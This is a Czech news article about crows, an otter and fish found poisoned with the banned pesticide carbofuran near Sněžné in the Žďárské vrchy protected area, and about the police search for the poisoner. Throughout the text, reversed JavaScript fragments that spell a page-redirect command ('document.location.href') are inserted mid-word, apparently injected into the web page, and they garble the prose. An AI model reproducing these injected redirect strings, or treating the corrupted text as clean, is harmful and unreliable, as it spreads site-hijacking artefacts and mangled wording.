Rainbow page separator

Zvířata u Sněžného zabil karbofuran, policie hledá traviče

Neděle, 3. března 2019

Sněžné / Hejno devíti vran šedých usmrtil travič na začátku ledna u Sněžného v CHKO Ždárské vrchy. Mrtvé ptáky našli místní obyvatelé, kteří informovali policii. Následná labora[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torní analýza ukázala, že vrány otrávil nervový jed karbofuran. Správa Chráněné oblasti Žďárské vrchy požádala o prohledání lokality terénní jednotkou České společnosti orni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologické.
„Poblíž místa, kde se našly vrány, jsme dohledali zbytek zřejmě ryby a o 200 metrů dál v po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toce mrtvou vydru. I u nich analýza prokázala karbofuran,“ okomen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovala nálezy psovodka Klára Hlubocká z České společnosti orni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologické.
Karbofuran je extrémně silný a nebezpečný i pro člověka. Oběť po jeho požití umírá v křečích za plného vědomí udušením. Jeho používání i skladování je v Evropské unii zakázáno od roku 2008. Oběťmi travičů se stávají čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vzácní a kriticky ohrožení dravci. Kvůli umisťování nástrah ve volné přírodě však patří k potenciálním obětem i mnoho dalších zvířat včetně psů, kteří jsou na vycházce s majitelem.
Případy otravy zvířat karbofuranem jsou nyní hlášeny i z jiných částí republiky, například z Plzeňska nebo východních Čech, na jejich objasňování pracuje policie.